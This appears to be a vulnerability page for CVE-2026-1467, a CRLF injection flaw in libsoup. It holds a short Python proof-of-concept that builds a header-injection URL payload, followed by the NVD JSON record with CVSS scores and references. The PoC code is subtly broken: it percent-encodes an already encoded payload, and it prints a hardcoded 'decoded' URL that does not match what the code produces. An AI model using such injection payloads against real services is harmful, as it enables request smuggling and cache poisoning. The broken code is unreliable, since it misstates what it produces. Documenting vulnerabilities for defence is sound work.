CVE-2026-1467

import urllib.parse # CVE-2026-1467 CRLF Injection PoC for libsoup # This PoC demonstrates how CRLF characters can be injected into HTTP headers def generate_crlf_payload(): """ Generate a malicious URL that exploits CRLF injection in libsoup when used with HTTP proxy configuration """ # Original benign URL base_url = "http://example.com/path" # Malicious payload with CRLF injection # %0d = CR (Carriage Return), %0a = LF (Line Feed) malicious_path = "/path%0d%0aX-Injected-Header: malicious-value%0d%0a" # URL encode the payload encoded_payload = urllib.parse.quote(malicious_path, safe='') # Full malicious URL malicious_url = f"http://example.com{encoded_payload}" print(f"Benign URL: {base_url}") print(f"Malicious URL: {malicious_url}") print(f"Decoded malicious URL: http://example.com/path\\r\\nX-Injected-Header: malicious-value\\r\\n") return malicious_url def demonstrate_attack(): """ Demonstrate the CRLF injection attack scenario """ print("=" * 60) print("CRLF Injection Attack Demonstration") print("Target: libsoup HTTP client library") print("CVE: CVE-2026-1467") print("=" * 60) # Generate payload payload = generate_crlf_payload() print("\nAttack Impact:") print("1. Attacker can inject arbitrary HTTP headers") print("2. Attacker can split HTTP responses") print("3. Attacker can poison proxy cache") print("4. May lead to XSS or request smuggling") return payload if __name__ == "__main__": demonstrate_attack()

{"cve": {"id": "CVE-2026-1467", "sourceIdentifier": "[email protected]", "published": "2026-01-27T10:15:48.597", "lastModified": "2026-03-25T14:20:18.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libsoup, an HTTP client library. This vulnerability, known as CRLF (Carriage Return Line Feed) Injection, occurs when an HTTP proxy is configured and the library improperly handles URL-decoded input used to create the Host header. A remote attacker can exploit this by providing a specially crafted URL containing CRLF sequences, allowing them to inject additional HTTP headers or complete HTTP request bodies. This can lead to unintended or unauthorized HTTP requests being forwarded by the proxy, potentially impacting downstream services."}, {"lang": "es", "value": "Se encontró una falla en libsoup, una biblioteca cliente HTTP. Esta vulnerabilidad, conocida como inyección CRLF (Carriage Return Line Feed), ocurre cuando se configura un proxy HTTP y la biblioteca maneja incorrectamente la entrada decodificada de URL utilizada para crear el encabezado Host. Un atacante remoto puede explotar esto al proporcionar una URL especialmente diseñada que contiene secuencias CRLF, permitiéndoles inyectar encabezados HTTP adicionales o cuerpos completos de solicitudes HTTP. Esto puede llevar a que solicitudes HTTP no intencionadas o no autorizadas sean reenviadas por el proxy, afectando potencialmente a los servicios posteriores."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-93"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnome:libsoup:-:*:*:*:*:*:*:*", "matchCriteriaId": "C5BAC4F4-3ACD-4F4D-920C-F920FD2C5472"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-1467", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433174", "source": "[email protected]", "tags": ["Issue Tracking", "Third Party Advisory"]}, {"url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/488", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]}]}}